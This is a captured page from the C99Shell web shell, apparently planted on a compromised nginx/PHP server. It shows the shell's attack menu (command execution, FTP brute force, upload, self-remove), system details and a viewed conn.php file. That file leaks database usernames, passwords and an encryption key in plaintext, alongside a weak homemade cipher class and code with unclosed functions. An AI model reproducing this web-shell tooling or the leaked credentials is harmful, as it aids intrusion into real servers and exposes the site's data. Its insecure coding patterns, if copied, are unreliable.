!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     conn.php (3.15 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php  
include_once("/home/wwwroot/frames/conexion/conn.php");
/* 
if (!defined("DIF_HORARIA"))define("DIF_HORARIA",0);
if (!defined("DIF_HORARIA"))define ("DIF_HORARIA",40);
if (!defined("RUTA_FTP"))define ("RUTA_FTP","http://papyrefb2.net/libros/");    
if (!defined("RUTA_FTP2"))define ("RUTA_FTP2","http://98.158.179.254/newlibros/");   
if (!defined("BBDDHOST"))define ("BBDDHOST","localhost");
if (!defined("BBDDUSER"))define ("BBDDUSER","papyr225_phpb1");
if (!defined("BBDDPASSWORD"))define ("BBDDPASSWORD","bJ8V1vmDPkHZ");
if (!defined("BBDD"))DEFINE ("BBDD","papyr225_papyre");
if (!defined("BBDD_FORO"))DEFINE ("BBDD_FORO","papyr225_phpb1");
if (!defined("LALALA"))DEFINE ("LALALA","W2KPRO_7_caballos_vienen_de_bonanza");
if (!isset($bbddhost))$bbddhost="localhost";
if (!isset($bbdduser))$bbdduser="papyr225_1";
if (!isset($bbddpassword))$bbddpassword="ilvm2rg2";
if (!isset($bbdd))$bbdd="papyr225_papyre";
if (!isset($localhost))$localhost="http://www.papyrefb2.net";
if (!isset($mirror))$mirror="http://www.papyrefb2.com";
date_default_timezone_set('Europe/Madrid');


 //echo  $_SERVER['REMOTE_ADDR'];
 

  
if (!isset($conn)){
$conn=&mysql_connect($bbddhost,$bbdduser,$bbddpassword)or die("error de conexion con BBDD");
mysql_set_charset('latin1',$conn); 
mysql_select_db($bbdd,$conn)or die(mysql_error());
}
 

//$conn=mysql_connect("localhost","papyre2","ilvm1rg1");


function elimina_acentos($cadena){
$tofind = "��&:�����������������������������������������������������+[]?�!�,;�'".'\\';
$replac = "--y_nNAAAAAAaaaaaaOOOOOOooooooEEEEeeeeCcIIIIiiiiUUUUuuuuy_()----_-i-"."-";
return(strtr($cadena,$tofind,$replac));
}
function elimina_acentos_light($cadena){
$tofind = "��&:���������������������������������������������������+[]!,;�'".'\\';
$replac = "--y_AAAAAAaaaaaaOOOOOOooooooEEEEeeeeCcIIIIiiiiUUUUuuuuy_()-_-i-"."-";
return(strtr($cadena,$tofind,$replac));

function elimina_acentos_mini($cadena){
$tofind = "���������������������������������������������������";
$replac = "AAAAAAaaaaaaOOOOOOooooooEEEEeeeeCcIIIIiiiiUUUUuuuuy";
return(strtr($cadena,$tofind,$replac));


class Encriptor
{
    # The key (for security reason, it must be private)
    private $Key='W2KPRO_7_caballos_vienen_de_bonanza';

    // Generates the key
    public function __construct($Key = 'W2KPRO_7_caballos_vienen_de_bonanza') {
        $Key = str_split(md5($Key), 1);
        $signal = false;
        $sum = 0;
        foreach($Key as $char) {
            if($signal) {
                $sum -= ord($char);
                $signal = false;
            } else {
                $sum += ord($char);
                $signal = true;
            }
        }
        if($sum < 0) $sum *= -1;

        $this->Key = $sum;
    }

    // Encrypt
    public function encrypt($text) {
    $text=base64_encode($text);
        $text = str_split($text, 1);
        $final = NULL;

        foreach($text as $char) $final .= sprintf("%03x", ord($char) + $this->Key);

        return $final;
    }

    // Decrypt
    public function decrypt($text) {
        $final = NULL;
        $text = str_split($text, 3);
        foreach($text as $char) $final .= chr(hexdec($char) - $this->Key);

        return base64_decode($final);
    }
}
*/
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0047 ]--